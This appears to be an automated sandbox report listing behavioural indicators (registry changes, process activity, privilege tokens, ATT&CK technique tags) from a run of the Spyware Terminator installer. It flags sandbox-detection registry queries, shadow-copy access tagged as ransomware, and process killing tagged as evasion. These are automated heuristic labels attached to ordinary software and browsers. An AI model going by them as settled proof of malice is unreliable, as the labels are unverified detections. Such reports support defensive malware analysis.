Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SpywareTerminatorUpdate.exe

EICAR Anti-Malware test file 1 IoCs

resource	yara_rule
behavioral1/files/0x0009000000023d65-718.dat	eicar_test_file

Makes web request to EICAR website 1 IoCs

EICAR Anti-Malware test file, used to test the response of AV software.

description	flow	ioc
HTTP URL	1592	https://www.eicar.org/download/eicar-com/?wpdmdl=8840&refresh=672e945b769e71731105883

Checks SCSI registry key(s) 3 TTPs 11 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	dxdiag.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	dxdiag.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs	dxdiag.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	dxdiag.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	dxdiag.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000e6cf55ff94a5976e0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000e6cf55ff0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900e6cf55ff000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1de6cf55ff000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000e6cf55ff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	dxdiag.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
3064	timeout.exe
4816	timeout.exe

Enumerates system info in registry 2 TTPs 12 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Interacts with shadow copies 3 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
6028	vssadmin.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
4824	taskkill.exe
5216	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Internet Explorer\Approved Extensions	regsvr32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\Approved Extensions\{82A76710-4F98-4957-92BE-99648A4E2475} = 51667a6c4c1d3b35007bb198a81d3b0d8ab1de248b0c6468	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Internet Explorer\Approved Extensions	regsvr32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\Approved Extensions\{82A76710-4F98-4957-92BE-99648A4E2475} = 51667a6c4c1d3b35007bb198a81d3b0d8ab1de248b0c6468	regsvr32.exe

Modifies data under HKEY_USERS 7 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	st_rsser64.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133755799812007977"	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	st_rsser64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	st_rsser64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	st_rsser64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	st_rsser64.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F32C83B9-DF1D-42AD-9741-C52909703957}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F32C83B9-DF1D-42AD-9741-C52909703957}\InprocServer32\ = "C:\\Program Files (x86)\\Spyware Terminator\\STShell.dll"	regsvr32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads"	analyzefile.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CLSID\ = "{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}"	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ = "DxDiagClassObject Class"	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F32C83B9-DF1D-42AD-9741-C52909703957}\InprocServer32\ThreadingModel = "Apartment"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\ContextMenuHandlers\STShellMenu\ = "{F32C83B9-DF1D-42AD-9741-C52909703957}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E02A03C6-AACF-4F93-BCB3-98CF673EA41B}\InprocServer32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C953ED86-86C1-46B4-8E3E-1D778E1AD3D1}\Implemented Categories\{7DD95802-9882-11CF-9FA9-00AA006C42C4}	regsvr32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4"	analyzefile.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\STShell64.STShellMenu\Clsid\ = "{F32C83B9-DF1D-42AD-9741-C52909703957}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{59DB22BF-6E15-4E29-B7DB-8CECE15970D7}\TypeLib	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C953ED86-86C1-46B4-8E3E-1D778E1AD3D1}\Implemented Categories\{7DD95802-9882-11CF-9FA9-00AA006C42C4}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{82A76710-4F98-4957-92BE-99648A4E2475}\Implemented Categories\	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{82A76710-4F98-4957-92BE-99648A4E2475}\Implemented Categories\{59FB2056-D625-48D0-A944-1A85B5AB2640}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{74CC240A-0E71-4F1A-9D11-B421621C5141}\Shell\Open\Command	SpywareTerminator.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\STShellMenu	regsvr32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 14002e80922b16d365937a46956b92703aca08af0000	analyzefile.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C953ED86-86C1-46B4-8E3E-1D778E1AD3D1}\ = "Spyware Terminator 2015 Internet Guard"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	0d4bf4e1a47fa2cfdb5cdc23d8a2b1552c1d82c307e1eec95297e62a478d2f2d.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ForceRemove	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{82A76710-4F98-4957-92BE-99648A4E2475}\Implemented Categories\	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\ContextMenuHandlers\	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F32C83B9-DF1D-42AD-9741-C52909703957}\InprocServer32\ = "C:\\PROGRA~2\\SPYWAR~1\\STShell.dll"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\ContextMenuHandlers\	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5DF5B855-B362-4703-9374-F7939955F0A5}\1.0\FLAGS\ = "0"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E02A03C6-AACF-4F93-BCB3-98CF673EA41B}\InprocServer32\ThreadingModel = "Apartment"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F32C83B9-DF1D-42AD-9741-C52909703957}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\STShellMenu\ = "{F32C83B9-DF1D-42AD-9741-C52909703957}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\STShellMenu	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ForceRemove\ = "Programmable"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\STShell.STShellMenu\Clsid	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\STShellMenu	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\STInternetGuard.ProtNego	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C953ED86-86C1-46B4-8E3E-1D778E1AD3D1}\ProgID	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\*\shellex\ContextMenuHandlers	regsvr32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	analyzefile.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	analyzefile.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C953ED86-86C1-46B4-8E3E-1D778E1AD3D1}\TypeLib	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\*\shellex\	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{59DB22BF-6E15-4E29-B7DB-8CECE15970D7}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E02A03C6-AACF-4F93-BCB3-98CF673EA41B}\ProgID	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\STShell.STShellMenu	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{59DB22BF-6E15-4E29-B7DB-8CECE15970D7}\TypeLib\ = "{5DF5B855-B362-4703-9374-F7939955F0A5}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\STInternetGuard.JSObj\Clsid	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{82A76710-4F98-4957-92BE-99648A4E2475}\	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{82A76710-4F98-4957-92BE-99648A4E2475}\Implemented Categories	regsvr32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	analyzefile.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider.1	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F32C83B9-DF1D-42AD-9741-C52909703957}\InprocServer32\ThreadingModel = "Apartment"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\STShell.STShellMenu\Clsid\ = "{F32C83B9-DF1D-42AD-9741-C52909703957}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5DF5B855-B362-4703-9374-F7939955F0A5}\1.0\HELPDIR\ = "C:\\Program Files (x86)\\Spyware Terminator\\"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	analyzefile.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F32C83B9-DF1D-42AD-9741-C52909703957}\InprocServer32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{82A76710-4F98-4957-92BE-99648A4E2475}\ = "Spyware Terminator 2015 Internet Guard"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell	analyzefile.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0"	analyzefile.exe

Modifies registry key 1 TTPs 3 IoCs

Modify Registry

pid	Process
4560	reg.exe
3288	reg.exe
2404	reg.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 15 IoCs

pid	Process
6140	chcp.com
4424	reg.exe
3976	reg.exe
4524	reg.exe
5424	reg.exe
5392	reg.exe
1428	reg.exe
536	reg.exe
3064	timeout.exe
4824	taskkill.exe
5216	taskkill.exe
1476	tasklist.exe
4652	findstr.exe
5376	myst-launcher-amd64.exe
4424	tasklist.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2340	SpywareTerminatorSetup.tmp
2340	SpywareTerminatorSetup.tmp
2340	SpywareTerminatorSetup.tmp
2340	SpywareTerminatorSetup.tmp
812	st_rsser64.exe
812	st_rsser64.exe
812	st_rsser64.exe
812	st_rsser64.exe
812	st_rsser64.exe
812	st_rsser64.exe
812	st_rsser64.exe
812	st_rsser64.exe
3376	msedge.exe
3376	msedge.exe
4884	msedge.exe
4884	msedge.exe
4512	identity_helper.exe
4512	identity_helper.exe
812	st_rsser64.exe
812	st_rsser64.exe
5040	SpywareTerminator.exe
5040	SpywareTerminator.exe
5040	SpywareTerminator.exe
5040	SpywareTerminator.exe
5040	SpywareTerminator.exe
5040	SpywareTerminator.exe
812	st_rsser64.exe
812	st_rsser64.exe
812	st_rsser64.exe
812	st_rsser64.exe
812	st_rsser64.exe
812	st_rsser64.exe
812	st_rsser64.exe
812	st_rsser64.exe
812	st_rsser64.exe
812	st_rsser64.exe
812	st_rsser64.exe
812	st_rsser64.exe
812	st_rsser64.exe
812	st_rsser64.exe
344	msedge.exe
344	msedge.exe
344	msedge.exe
344	msedge.exe
812	st_rsser64.exe
812	st_rsser64.exe
812	st_rsser64.exe
812	st_rsser64.exe
4172	msedge.exe
4172	msedge.exe
812	st_rsser64.exe
812	st_rsser64.exe
812	st_rsser64.exe
812	st_rsser64.exe
812	st_rsser64.exe
812	st_rsser64.exe
812	st_rsser64.exe
812	st_rsser64.exe
812	st_rsser64.exe
812	st_rsser64.exe
812	st_rsser64.exe
812	st_rsser64.exe
812	st_rsser64.exe
812	st_rsser64.exe

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

pid	Process
5056	SpywareTerminator.exe
760	SpywareTerminator.exe
2344	iexplore.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
664	Process not Found

Suspicious behavior: MapViewOfSection 6 IoCs

pid	Process
1084	Setup.exe
2648	Setup.exe
4300	more.com
1424	more.com
3772	BraveSharedUpdater.exe
2344	iexplore.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 36 IoCs

pid	Process
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
5084	msedge.exe
5084	msedge.exe
1468	msedge.exe
1468	msedge.exe
1468	msedge.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	812	st_rsser64.exe
Token: SeDebugPrivilege	5040	SpywareTerminator.exe
Token: SeDebugPrivilege	760	SpywareTerminator.exe
Token: SeDebugPrivilege	760	SpywareTerminator.exe
Token: SeDebugPrivilege	3636	SpywareTerminator.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2340	SpywareTerminatorSetup.tmp
5052	SpywareTerminatorUpdate.exe
5052	SpywareTerminatorUpdate.exe
5052	SpywareTerminatorUpdate.exe
5052	SpywareTerminatorUpdate.exe
692	SpywareTerminatorShield.exe
692	SpywareTerminatorShield.exe
692	SpywareTerminatorShield.exe
692	SpywareTerminatorShield.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
5040	SpywareTerminator.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
5052	SpywareTerminatorUpdate.exe
692	SpywareTerminatorShield.exe
692	SpywareTerminatorShield.exe
692	SpywareTerminatorShield.exe
692	SpywareTerminatorShield.exe
692	SpywareTerminatorShield.exe
692	SpywareTerminatorShield.exe
692	SpywareTerminatorShield.exe
692	SpywareTerminatorShield.exe
5052	SpywareTerminatorUpdate.exe
760	SpywareTerminator.exe
692	SpywareTerminatorShield.exe
692	SpywareTerminatorShield.exe
5052	SpywareTerminatorUpdate.exe
692	SpywareTerminatorShield.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
5052	SpywareTerminatorUpdate.exe
5052	SpywareTerminatorUpdate.exe
5052	SpywareTerminatorUpdate.exe
5052	SpywareTerminatorUpdate.exe
692	SpywareTerminatorShield.exe
692	SpywareTerminatorShield.exe
692	SpywareTerminatorShield.exe
692	SpywareTerminatorShield.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
4884	msedge.exe
